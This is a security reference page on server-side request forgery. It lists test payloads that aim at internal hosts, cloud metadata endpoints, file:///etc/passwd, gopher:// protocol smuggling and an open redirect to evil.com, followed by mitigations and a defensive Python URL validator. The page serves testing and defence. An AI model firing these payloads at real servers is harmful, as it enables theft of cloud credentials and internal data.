# SSRF

**Description:**\
Server-Side Request Forgery (SSRF) is a vulnerability in which an attacker makes the server issue requests to destinations of the attacker's choosing, including internal or otherwise unreachable network resources. Because the request originates from the server, it carries the server's network position and often its credentials, which can lead to unauthorized access to internal services, data exfiltration, and network enumeration.

**Example with Scenario:**\
Imagine a web application that fetches user-supplied URLs to display a thumbnail of the website. If the application does not validate the URL properly, an attacker can supply a URL pointing to an internal service, such as `http://localhost/admin`; the server fetches it and returns content that the attacker could never reach directly.

**Payloads:**

1. **Access Internal Services:**

   ```http
   http://localhost/admin
   http://127.0.0.1/admin
   http://internal-service.local/admin
   ```
2. **Access Metadata Services (Cloud environments):**

   ```http
   http://169.254.169.254/latest/meta-data/
   http://169.254.169.254/computeMetadata/v1/
   ```

   The first path is AWS: IMDSv1 answers a plain GET, while IMDSv2 first needs a token obtained with a PUT request, which most SSRF primitives cannot send. The second is GCP, which answers only if the request carries `Metadata-Flavor: Google`, so it is reachable only where the fetcher forwards attacker-controlled headers.
3. **Open Redirect Exploitation:**

   When the fetcher only accepts an allowlisted host such as `example.com`, an open redirect on that host makes the server follow the redirect to a destination that would have been rejected directly, whether an attacker-controlled host (to confirm blind SSRF) or an internal one:

   ```http
   http://example.com/?url=http://evil.com
   http://example.com/?url=http://127.0.0.1/admin
   ```
4. **Local File Read (`file://`):**

   If the URL handler supports `file://`, the response discloses files readable by the server process:

   ```http
   file:///etc/passwd
   file:///C:/Windows/system32/drivers/etc/hosts
   ```
5. **Protocol Smuggling:**

   `gopher://` sends whatever follows the leading `_` as raw bytes to the chosen TCP port, so a line-based service such as memcached on 11211 can be driven from a single URL (line breaks must be percent-encoded as `%0d%0a`); `ftp://` similarly reaches non-HTTP services when the client library supports it:

   ```http
   gopher://localhost:11211/_stats%0d%0a
   ftp://ftp.example.com/file.txt
   ```
6. **DNS Rebinding:**

   Point the server at an attacker-controlled name with a very short TTL. The lookup made while validating the URL returns a public address and passes the check; the lookup made when the HTTP client connects returns an internal address. Any validator that resolves the name and then lets the client resolve it again is vulnerable:

   ```http
   http://malicious.com (resolves to a public IP for the validation lookup, then to an internal IP for the connection)
   ```

**Test Cases:**

1. **Basic Internal Access:**

   ```http
   http://localhost:80
   http://127.0.0.1:8080
   ```
2. **Private IP Ranges:**

   ```http
   http://192.168.1.1:80
   http://10.0.0.1:8080
   ```
3. **Accessing Metadata Services:**

   ```http
   http://169.254.169.254/latest/meta-data/
   ```
4. **File Access:**

   ```http
   file:///etc/passwd
   file:///C:/Windows/System32/drivers/etc/hosts
   ```
5. **Alternative Protocols:**

   ```http
   ftp://example.com/file.txt
   gopher://localhost:11211/_stats
   ```
6. **Custom Headers:**

   If the fetcher lets you set headers on the outbound request, a `Host` header naming an internal virtual host can be combined with a destination that passes the allowlist (here `http://example.com` with `Host: internal-service.local`). Header control is also what makes the GCP metadata endpoint reachable, since it requires `Metadata-Flavor: Google`. The request the server ends up sending:

   ```http
   GET /admin HTTP/1.1
   Host: internal-service.local
   ```

**Mitigation:**

1. **Input Validation and Allowlisting:**
   * Only fetch URLs whose scheme and host match a strict allowlist. Resolve the hostname and check every returned address against loopback, private (RFC 1918), link-local and metadata ranges, rather than checking the hostname string alone, so that an allowed name which resolves to an internal address is still rejected.
2. **Disable Unnecessary Protocols:**
   * Restrict the outbound client to HTTP/HTTPS; `file://`, `gopher://` and `ftp://` handlers have no place in a URL fetcher.
3. **Network Segmentation:**
   * Run the fetching component in an egress-restricted segment that cannot reach internal services, management interfaces or the metadata endpoint directly.
4. **Metadata Service Protection:**
   * On AWS, require IMDSv2 so that a session token obtained via PUT is needed and set the hop limit so forwarded requests fail; on GCP the `Metadata-Flavor: Google` header is already required, so do not let users add headers to the outbound request. Block 169.254.169.254 for the application user with host firewall rules and keep instance roles minimally privileged so a leaked credential is worth little.
5. **Use a URL Parsing Library:**
   * Parse with one well-tested library and validate the resolved destination, then connect to the exact address you validated (DNS pinning) rather than letting the HTTP client resolve again. Reject userinfo (`http://trusted@127.0.0.1/`), alternative IP spellings (`127.1`, `2130706433`, `0x7f000001`) and IPv4-mapped IPv6 (`::ffff:127.0.0.1`). Disable automatic redirect following and apply the same checks to every hop, otherwise an allowed host with an open redirect forwards the server to an internal target.
6. **Timeouts and Retries:**
   * Set short connect and read timeouts, cap the response size and do not retry server-side requests, so the fetcher cannot be used as a slow port scanner or as an amplifier.
7. **Monitor and Alert:**
   * Log the resolved destination of every outbound request and alert on connections to loopback, private, link-local or metadata addresses, and on error patterns that look like port scanning (many distinct ports, connection refused versus timeout).
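
The following is an added example and not code from the playbook: a Python URL gate implementing the mitigations above, which also rejects the bypass spellings from the Payloads section (`127.1`, `0177.0.0.1`, `0x7f.1`, `2130706433`, `::ffff:127.0.0.1`, userinfo tricks) and defeats DNS rebinding by pinning. It assumes the application can inject a `resolver(host)` (defaulting to `socket.getaddrinfo`) and a `transport(ip, url)` that performs one non-following request; the hostnames `trusted.example` and `rebind.example` and the address `1.2.3.4` used when testing it are constructed.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit
# Added example, not the playbook's own code: a URL gate for a server-side fetcher
# that canonicalises IP literals, checks every resolved address, pins the
# connection to the checked address and re-validates every redirect hop.
ALLOWED_SCHEMES = {"http", "https"}
MAX_REDIRECTS = 3
EXTRA_BLOCKED = [ipaddress.ip_network("100.64.0.0/10")]  # CGNAT space; not in is_private

class UnsafeURL(ValueError):
    """A URL the server must not fetch on the user's behalf."""

def _ipv4_component(part):
    """One dotted component as C inet_aton() reads it: 0x hex, leading-0 octal, else decimal."""
    if part[:2].lower() == "0x":
        digits, base, alphabet = part[2:], 16, "0123456789abcdef"
    elif len(part) > 1 and part[0] == "0":
        digits, base, alphabet = part[1:], 8, "01234567"
    else:
        digits, base, alphabet = part, 10, "0123456789"
    if not digits or any(c not in alphabet for c in digits.lower()):
        return None
    return int(digits, base)

def parse_ipv4_literal(host):
    """Canonicalise bypass spellings: 127.1, 0177.0.0.1, 0x7f.1, 2130706433 are all 127.0.0.1."""
    values = [_ipv4_component(p) for p in host.split(".")]
    if not 1 <= len(values) <= 4 or None in values:
        return None
    *head, last = values
    last_bits = 8 * (4 - len(head))  # the last component fills the remaining octets
    if any(v > 255 for v in head) or last >= 1 << last_bits:
        return None
    number = 0
    for v in head:
        number = (number << 8) | v
    return ipaddress.IPv4Address((number << last_bits) | last)

def to_ip(text):
    """Strict IPv4/IPv6 first, then inet_aton forms; IPv4-mapped IPv6 is unwrapped."""
    try:
        addr = ipaddress.ip_address(text.split("%")[0])  # drop any scope id
    except ValueError:
        addr = parse_ipv4_literal(text)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 must be treated as 127.0.0.1
    return addr

def is_blocked(addr):
    """True for anything that is not a routable public address."""
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified
            or any(addr in net for net in EXTRA_BLOCKED))

def resolve_all(host):
    """Production resolver: every A/AAAA answer for host, as strings."""
    return {i[4][0] for i in socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)}

def validate_url(url, resolver=resolve_all):
    """Return (hostname, pinned_ip) or raise UnsafeURL. All resolved addresses must be
    public; the caller connects to pinned_ip and never re-resolves (defeats rebinding)."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise UnsafeURL("scheme not allowed: %r" % parts.scheme)
    if parts.username is not None or parts.password is not None:
        raise UnsafeURL("userinfo not allowed")  # e.g. http://trusted.example@127.0.0.1/
    host = parts.hostname
    if not host:
        raise UnsafeURL("missing host")
    literal = to_ip(host)
    addrs = {literal} if literal else {to_ip(a) for a in resolver(host)}
    if not addrs or None in addrs:
        raise UnsafeURL("host does not resolve: %s" % host)
    for addr in addrs:
        if is_blocked(addr):
            raise UnsafeURL("%s -> %s is not a public address" % (host, addr))
    return host, str(min(addrs, key=str))

def is_safe_url(url, resolver=resolve_all):
    try:
        validate_url(url, resolver)
        return True
    except UnsafeURL:
        return False

def safe_fetch(url, transport, resolver=resolve_all, max_redirects=MAX_REDIRECTS):
    """Follow redirects by hand so every hop is validated and pinned. transport(ip, url)
    makes one request without following redirects and returns (status, headers, body);
    a real transport connects to ip and takes Host and SNI from the URL's hostname."""
    for _ in range(max_redirects + 1):
        _host, ip = validate_url(url, resolver)
        status, headers, body = transport(ip, url)
        if status in (301, 302, 303, 307, 308) and "Location" in headers:
            url = urljoin(url, headers["Location"])  # relative Location is fine
            continue
        return status, body
    raise UnsafeURL("too many redirects")
```

In production the `transport` must open the socket to the pinned `ip` (for example by substituting it into the URL and sending the original hostname as the `Host` header and TLS SNI); letting the HTTP client resolve the name a second time reintroduces the rebinding window. The check covers every address returned, so a name with one public and one internal answer is rejected rather than gambling on which one the client picks.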
